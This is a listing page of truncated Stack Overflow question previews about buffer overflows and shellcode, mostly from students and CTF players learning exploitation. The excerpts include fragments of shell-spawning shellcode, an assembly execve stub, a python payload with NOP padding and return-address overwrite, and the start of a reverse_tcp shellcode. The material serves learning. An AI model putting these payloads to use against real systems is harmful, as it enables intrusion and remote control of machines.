All Questions
Tagged with buffer-overflow shellcode
87 questions
0
votes
1answer
54 views
Shellcode successfully executes /bin/sh but immediately terminates
I'm trying to solve a very simple exploiting challenge as exercise.
It is about injecting shellcode via buffer overflow, there is no ASLR and the stack is executable.
The payload I send is the ...
2
votes
1answer
118 views
The Shellcode to open Calc.exe too long and complex, can't understand! My first exploit program
I wrote my first exploit program on Windows XP OS using the shellcode i foung on the web. It opens the calculator and the overall program works successfully. However, even though i did not write the ...
0
votes
2answers
46 views
Buffer overflow - set relevant text to be printed
#include <unistd.h>
char shellcode[] = "???";
int main(int argc, char* argv[]) {
int* ret;
ret = (int*) &ret + 2;
(*ret) = (int) shellcode;
}
I have to change shellCode ...
0
votes
1answer
23 views
The address of an environment variable changes every time it is checked
I'm trying to learn how to use buffer overflow to change the address in esp to run a shell code; and I've defined a environment variable called "SHELLCODE" to store execution of the shell code, but ...
0
votes
2answers
30 views
Buffer Overflow - Printing host/user-name
I'm trying to perform a Buffer overflow attack on a simple C program to get a bit hands on knowledge on how it works. So far I a python script which has a bunch of \x90s and the return address which ...
0
votes
1answer
146 views
exporting environment variable with python
I'm trying to export an environment variable using python, but I can't seem to figure it out.
This is what I'm trying to copy:
export SHELLCODE = $(python -c "print <shellcode here>")
This is ...
0
votes
1answer
87 views
Assembly version of C code to launch a shell
In buffer overflow assignment, I got a C file (call_shellcode.c) which contains an assembly version of the following C code which executes to open a shell:
#include <stdio.h>
#include <...
1
vote
1answer
60 views
Buffer Overflow shellcode overwriting wrong address
NOTE: This is a modified version of my original post here but
poses a slightly different question.
I am going through this video on buffer overflows but am having some trouble replicating the demo. ...
0
votes
0answers
200 views
How to open a new terminal at bin/sh using shellcode?
I am currently taking a class dealing with Computer Security. I am researching basically how to open a command shell at "/bin/sh" by exploiting some poorly written C code. I have set everything up ...
2
votes
1answer
142 views
Why does the amount of NOPs seem to impact whether shellcode is executed successfully?
I'm learning about buffer overflows (for educational purposes only) and while playing around with the NOP sliding technique to execute shellcode some questions arised as to why shellcode sometimes is ...
3
votes
1answer
129 views
How can I use bufferoverflow to both execute a program remotely and write the output to a socket?
I am working on a CTF challenge so this is not for any malicious purposes. I have successfully used buffer overflow to gain access to a remote system. However, my issue lies in the fact that I need ...
1
vote
2answers
584 views
Difficulties injecting shellcode with buffer overflow
For an assignment I am doing, I must inject shellcode to execute execve(/bin/bash) into the following C program:
#include <stdio.h>
#include <string.h>
void return_input(void)
{
char ...
2
votes
1answer
857 views
Illegal Instruction when trying to get shell from a simple stackoverflow
I'm trying to exploit the stack overflow vulnerability to get a shell. When i tried to run it, It shows illegal hardware instruction after executing the shellcode instead of giving a shell(error ...
0
votes
2answers
371 views
shellcode buffer overflow -SegFault
I'm trying to run this shellcode but I keep getting segmentation fault
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include ...
0
votes
0answers
78 views
ASM shell spawner works, but fails in buffer overflow implementation
I have my assembly code:
section .shellcode progbits alloc exec write align=16
global _start
_start:
xor rdx,rdx
xor rbx,rbx
xor rax,rax
xor rsi,rsi
xor rdi,rdi
mov qword rbx,0x68732f6e69622f2f
...
0
votes
1answer
198 views
BOF with non exec stack
I'm try to pass the level 2 of this "game" http://smashthestack.org/faq.html (connect via ssh on the blackbox server) that consist of a basic buffer overflow.
In the directory /home/level2 (there ...
1
vote
1answer
939 views
A buffer overflow exercise using a shellcode
I have doing an exercise about a buffer overload on a C program, the goal of this problem is to get the root shell once I have inserted a shellcode into the program. This is what I have until now:
...
1
vote
1answer
305 views
Buffer overflow change return address C - without main
How can I get the eip register to point to memory address to execute my shellcode in the following program using buffer overflow?
static int __init onload(void)
{
void function1(char *arg1)
{...
-1
votes
2answers
257 views
(radare2, shellcode) int 0x80 jumping to invalid address
I'm executing a 32bit program (my arch is 64bit).
Vulnerable code:
#include <string.h>
#include <stdio.h>
void main(int argc, char *argv[]) {
copier(argv[1]);
printf("Done!\n");
}
...
0
votes
0answers
97 views
buffer overflow task, cannot run shellcode
I have been struggling for 1 week and cannot figure this out. Please help.
My friend gave me an executable which is just a simple server and has buffer overflow vulnerability. My goal is to get a ...
1
vote
1answer
213 views
Shellcode not executed properly
I am trying to solve Protostar stack5.
Here is a solution.
It puts the shellcode after the return address, I tried to put it before, in the array.
I have tried the shellcode, it works.
It seems ...
1
vote
2answers
415 views
return to libc attack using a function pointer
How should I format my input for the return to libc attack in the following code:
void example_function(int x, const char *name)
{
void (*foo)(int, const char *) = http_serve_none;
char buf[...
1
vote
0answers
506 views
Why reverse_tcp Shellcode doesn't work?
I am using this shellcode:
\x6a\x66\x58\x6a\x01\x5b\x31\xd2\x52\x53\x6a\x02\x89\xe1\xcd\x80\x92\xb0\x66\x68\xc0\xa8\x0f\x81\x66\x68\x05\x39\x43\x66\x53\x89\xe1\x6a\x10\x51\x52\x89\xe1\x43\xcd\x80\...
0
votes
1answer
404 views
Buffer overflow success only when using gdb
If I modify return address directly with GDB, buffer overflow success and I can get shell. However when I don't use GDB, I can't get shell with same shell code. I can't find any difference between ...
2
votes
0answers
249 views
Buffer overflow attack with shell code
I used this shell code for buffer overflow attack
$(python -c 'print "\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x0f\x05\xc3"+"a"*31+"\x90\xe4\xff\xff\...
2
votes
0answers
166 views
Shellcode Segfault - testcase vs strcpy
So after taking a Software Security class I became very interested in tinkering with how shellcode works with buffer overflows. Most threads I read about the topic involve having the shellcode as a ...
0
votes
1answer
314 views
reverse move in stack without jmp
Update: Since I'm able to get the correct address into a register that I want to jump/call to, I think the best option would be to figure out a way to have self modifying code result in a jmp/call ...
0
votes
0answers
393 views
Shellcode Without null bytes
I am trying to convert an assembly program into null-free shellcode.
However, I am unsure how to go about this for certain instructions. Some of them way more complex than the examples I found in the ...
1
vote
1answer
233 views
Can't Reproduce Buffer Overflow Without GDB
I have been trying to troubleshoot this problem for a while. I have checked a few StackOverflow links with similar problems, but none of the fixes seemed to work for me. For some reason, instead of ...
0
votes
1answer
2k views
What is the size of a return address?
I know that this might sound a bit noobish, but I cant find this anywhere.
On a 64 bit machine, how many bytes is a return address? What about 32 bit?
The reason I am asking is because I am learning ...
-3
votes
1answer
660 views
Aleph one code - buffer overflow [closed]
I got this code of aleph one:
shellcode.h
#if defined(__i386__) && defined(__linux__)
#define NOP_SIZE 1
char nop[] = "\x90";
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\...
1
vote
1answer
1k views
Can you explain the method of finding the offset of a buffer when looking for buffer overflow potential
I'm looking at aleph's article on phrack magazine. The code below can also be found there.
We have a vulnerable executable which it's code is:
vulnerable.c
void main(int argc, char *argv[]) {
...
0
votes
2answers
1k views
buffer overflow exploit change function call
I am trying to perform a buffer overflow to change the call from function A to function B. Is this do-able? I know I will have to figure out how many bytes I have to enter until I have control over ...
1
vote
2answers
1k views
Exploit Development - Shellcode Doesn't Work?
I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.
Firstly, I found the position of EIP was after the 26089 As (at ...
0
votes
1answer
535 views
get segmentation fault when executing shellcode
I 'm trying to execute program with shell code injected into stack (program getting from securityTube.net tutorial , Megaprimer buffer overflow ) very good site (http://www.securitytube.net/)
Our ...
1
vote
0answers
462 views
Issue with assembly when trying to spawn shell
I am working on a buffer overflow in C trying to get a shell to spawn. I have had little to no success in doing this. The closest I have gotten to accomplishing this was a segment fault when I believe ...
1
vote
1answer
447 views
“Simple” buffer overflow in Windows 8
I'm trying to create two simple programs in C to simulate a buffer overflow:
first one accepts an input and copies it to the memmory
second one
abuses the first one to execute some shellcode that ...
1
vote
2answers
2k views
Call function in buffer overflow
I'm learning about buffer overflows and found a challenge that has a program somewhat like this:
int main() {
do_something()
return 0;
}
void do_something() {
//get inputs
printf("...
0
votes
1answer
281 views
Findout address of shellcode dynamically, placed on stack
I am using shellcode to spawn a shell,I am curious to findout the starting address of shellcode dynamically,which is placed on stack and not hard code the address in the shellcode
kindly share your ...
0
votes
1answer
832 views
About buffer overflow shellcode position
Im learning exploit. In all BOF examples, the shellcode is always placed in the buffer => shellcode + padding + overwrite return addr. Is it possible to place the shellcode after the return address ...
2
votes
0answers
482 views
Why is eip not being overwritten with the shellcode I am overflowing with?
So I am having to do a buffer overflow for an assignment and I feel like I am very close. I must note that my teacher has set up a VM for us to use in which if we are able to get shellcode into the ...
3
votes
1answer
843 views
Write buffer overflow exploit — how to figure out the address of the shellcode?
When writing buffer overflow exploit, I understand that I'll need to input an array of length (address_of_return_address - address_of_buffer). And the array needs to be filled with the address of the ...
0
votes
1answer
172 views
BufferOverflow shell not spawn
I'm trying a buffer overflow on a simple program
#include <stdio.h>
int main(int argc, char **argv)
{
char buf[8];
gets(buf);
printf("%s\n", buf);
return 0;
}
...
0
votes
1answer
602 views
Solution to stack5.c (buffer stack overflow EIP) on x64
I am following the totorials provided on the following links to learn how to insert shell code through a buffer overflow and redirecting your EIP/RIP towards properly crafted shell code to print you ...
-3
votes
2answers
68 views
accessing a function that is defined after main
I have a C source file that I'm not allowed to change and it is defined as follows:
int main(int argc, char *argv[])
{
//doing something
return 0
}
void __magic()
{
__asm__("jmp %esp");
}...
0
votes
1answer
644 views
shellcode spawning a shell
I have my assembly code to spawn a shell
global _start
section .text
_start:
xor eax, eax
push eax
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push eax
mov edx, esp
...
1
vote
2answers
404 views
segmentation fault while running shellcode
I am experimenting with shellcode before digging deep into it so I came across an example from the shellcoders handbook. The example is the following:
char shellcode[] = "\xeb\x1a\x5e\x31\xc0\x88\...
1
vote
1answer
693 views
Inject Shellcode - program running and need to inject hexcode from maybe python
So I have a vulnerable program which is to be exploited using buffer overflow. After analysis I have all the relevant values(buffer size, the address to be injected ,etc )
The issue is that I need to ...
2
votes
0answers
1k views
How to buffer overflow the 'gets' method in Ruby?
I wrote a client that gets input from the keyboard and stores it in a variable, like so:
x = gets
In C, normally memory is allocated for standard input and thus I can easily overflow the buffer and ...
-1
votes
1answer
156 views
need to detect any possible buffer overflows
hi guys i need some help with this code. i want to know if there is any buffer overflow in this code. basically this is an exercise for my university. we need to exploit it to open a shell. until now ...
